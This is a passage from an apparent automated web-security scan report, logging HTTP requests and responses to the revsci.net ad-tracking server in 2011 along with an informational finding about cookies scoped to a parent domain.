txvmN3uOVuc5NDiDAySPpWWPnSs=; rtc_8DRJ=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8DRJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140+huQIMp6aIYFMFwqgWeIORGubrqCfUW+jAEw/k86fOUkLBrkqruxUK6pw26DoqglBBbZcHQw/BQ3ETC90T3xVW/k94jPzDisxc1qUSPzP1W/5KJ+SuMwS1cGXU2WThy715UsCX3oOs1TnDs2Nod6SswWDEE4NEmp0MDF61Na0kE94w4AtHiyDftLB4ogw3As3DRaWjEynunLfYNB3YmeW1b2fEkOddDeiqksWnYHDCwWxJfg3JeA6UuCsCgYD4zMlQ45adSSRSxBpu0UmJDYX3l0qRD5J8lODoCv4adidCtN4IceFPVUFHY9FZY3/PJk2dVbDuFafEZzrna/Oq3tH0UlHoUXROa7JpFrDGgnzG6RmNPT9xswMJpJ/4/LgGHZeDf4qGPW4sud/IG+z2/3Ui/IE7aVfW1hU0LSLHXkJnGr4JGazsvemcLYhZIKPfDohSpqnRYnFDNeUyObH/3DqIMckjLKgBBocNxTXrrKkwOckpU45W2v0U3IyCEnLU2bzXWRrtK+aB/hmuSIKssoShQUgkJSMk5D4gDHF0Lop44WgcJdumDusXVvy8Pf7a7oGeSPoWB36tIetGID0g0w==; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf469&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:38:17 GMT; Path=/
Set-Cookie: rtc_Wrpy=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCbHQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2vhGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3GPbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.41. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/807655569.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/807655569.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP140+huHIQDruItGF29/z0a0qdLOaaQnczyWBW6QQ4O3XYuv0liDtqNncA2iFgLyKdDKURNw+S7oQxbOYTHYrKZ2dbvcV56gmyoyU4a2CMf5ovXdEZFcE017Ryqk+7nNFKUlIhPaZaEjzyv5uobKDuejN4W8yhWG/DFPY+M9w2cuecXe9PcpFr0MiJx9yLdq6TTyhSv6PuviC0MN4iKZDkVHzeHcIGMiXdci2bVc4S1cz+9VDmjLExI7RS7MGqqNuya1ss6T2bFacwQP85FS+V6wTdARcJAef2gmv/VTj3x5h4uUd2KuNYX6aHXuiT3h3m8CKB/0AOk9wWBNVPUfegcRyuqIopqk6aDacDhIWbYpka4KxJ5Au6n749iv1R7xCtAEW1joHLhacGq2erlzGy658wn63U+JplcyWh3kMaEJqXxWY+ROvlqSuqXjsCC0qjB/NDXEwTNTA9ZnxJBAIC2mnOSncbDfyTxRILJj3BJHbs5qr7TOO/HZNWacPaSHHs92dfHkKBwBMygq1CPNLMNqgAn9aHt0Xd5asOlVgQ+wMvZGsvN+IiS/oMSjLfugorj+hpz4sT/aI=; rtc_gNkk=MLvn9jM1Jgpr54aeFy58YLrc3TPJXKuUhF+WKpWQ6BT9vtIMiLEgfriSIH+6oN7+gF9hY+HDTba4RTjzA519wkRHZcOAJEo4DQzt2Om/hARoMTcLYKE4b9Mk3IyFloX4lVi/0zObRRfG/BqiXqBUCsu9DR7K8008eZg4eQFvS5MzWThlk8WWNcoC9XDBsIaSi9nd4TH7BLUfaDl5nZIqlDBCeZfsq5IrZg73tkP4E2yiMsBY+NuBZX/1qeiF34a22ee6sDUKIxVpAmcv4nhe0LXvJDdS4iC9TldQnJlW761Iu9PGbayZw9MbzArkTKcIpHM8E+Os9AEPY7O6oRLRFFyxBRbtX2QSKiWNR4VoM+1FCrFdKyVCKiEd38QdLXcycGkOqfOJf5mxNMKGG/62UDrXysoExPPPkaHRyNEHI4ONCijKQeNg4Tprvy8xiEFwV7pUk55r0Uf1rdz5sbPL7rDAOQlrKYryCdPj5wFP0f++d1twsfNbWi2huPm8m9HwoNU954aVSLkceBGu9dZOOeetxqPewEdPxHyIsSaGmEvexjPrrTASD7QsT02gWWSHW6XI18VbNNmdwjIzFNi9N/mKv/c2e8XGnbl1ez0CVJlIRwDHnpB5xxpxtuaL0vbsvZRbeDRddVgKA0cJZNJD8DDM7rUBqzYYszdunVBZVxY0glO22UJOzGb/NDQu0BGtbZfxBLGNlTiP9AO2CFcUcKHFmIJAx1JvsBzyrM313xt+ttLSnlFFRcq7AIRyDyp+Fi3Ya4huqfx/m2rVBVeIPWWLZl9/uf1fJxiZUh24CF0po6s/LTg86FUZaYZX0mjFKIpDqS5VJRc3jo7RApI74eEZL1xDHCxCze1ohFq8jgKcdbQI0CevEfWbM5FfaReCoyHlCaobvF0GYEKHQr2V9hnv35BhxzEI25L5lfm77cKyt8xfrmiQHYpQRzApKVFb3YTmHMKZFZJ64J6V6dDZp+G3p21fv6Dtj/0ZO9hXpY2vSIg/P30WadGL5q4VYNVErOo9p1L3F5Ybowv7Kmvxa0p/j7UyrpFwLWGddArBKxiAY/TVYJh/JMQugWKt3nlJuinIfJ8GKIUGE0jyIIf3iFRaCfSGcDPYJdB8BT/JXEMxKRqqS6DypKcvjzS/tBZUwiCAJFx/9EyC7Y87mcVjmsr+3GbkMQQmeaMgxD0jmFUuKkH02ny91Jb5+VtUPGmjNrdl2KGe9TtIAY3t0ofHQrz6otIYD8qi8HUiWJmdRBsAS6wZPWrTrxM8m8vRALbZxPLLa/Lw/YlHTsMwQ3CyMzERhkgwh7Nwh+Ff3K6N0wPsQRrFWrKJr/04MNRKN8eEmpJxELGcZgeCELAurmuXmhOrwANWiFr6Y5D+Nzh7XaZ5QAjjEHnPx/yzNVRCoPQCBeMc063urg5UAbQDdyBdbr8brehaHtwit48XrkXPxYVmgHeTZBZElWHgm84RIXxtS3oPYdhov2zAM5MjoZfz0kW/1QnUeIEHrIYojONHEGCFUYZbk9fgVO477YrqJm74Ild5/OnZXA5njF+ln1ytVEFTrBYq0oDHk8Ba5wiiEL065y18CXWfM8ucXNv9fbeZ2ooHI8QbxxoTx/uHwt2wpal+Xn30BUwfUt1JmeHJrpCyyzX4qN30Yd9DcYhQ6W47GnbjBcuu+pe+jx1T6sX7nRsFsziOctAgDKvHI0SVIrepM0q5rVA1gwIFolJeC0LGuOJPX6oSxwxzfvFYmR6e0G+eB+TIU0fkTsktG1e7YEC3Z5S3wAzn3TEOymS/ajl80qxtQbfDmRUKB5ZgYZDEQchUlMTjKwzUlZbzvODGAoDkHcyd5gATArIYcBJOivK2FGlFtWBaJQKi/5GQkLoXm9K9n5dvcxVPSw==; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140+hOXIQDbuItGF29/xEGUv1FubrqCfUW+jA6QVisncWnhlMqxnmqlK+Gc1/8AbHoS/xi5YHLnczfPRUA3gJWSaDZaFmfmF0EbSDNmBG1fOmAegAqCklFjFRrtAdnSEyzOR2vkTJEi+F1N5+bQ/fd1erj8QlOab2cEor5jviZ97kXMiuRXOnB2UFV7/sZIcaURRKz7Uv9MDPT3lhtVcyP2xRVRyIB4psUdE3oZ1iEDeZKV4pqzK81Wyg7bymxhKB6G54ZssFJisgx/lNHy5uZFwrV5vzCX8a4Dq/3NhTt8bwuFaMfJuP686aPFmTV7jIjz8eqnHWAdhFw/vhq3tRF22lFOsWi2fik5Qs1ygvLlS/AAOJambdMKAxMze9oyjqdue5KVscRaaSTDBR39m2I6WGpJnYWoZPwOlbOq289rSmuxrvYkJOUvJ4nORGK5OA4MrlGrSkBzPLXgjMKYbLhlaLR9EzyZYjguS7YH1evU5W/7biSJhw8dNrcjfREGhQI8vP7himw/9oLG5wjurEMHM5qqesVXWTaHs2I5op7e8sn1oXTjw2vz5oUDUPn/XHNbt/PPPVr7OwRi48FzkovHuGO80YnTM=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: rtc_Siob=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmt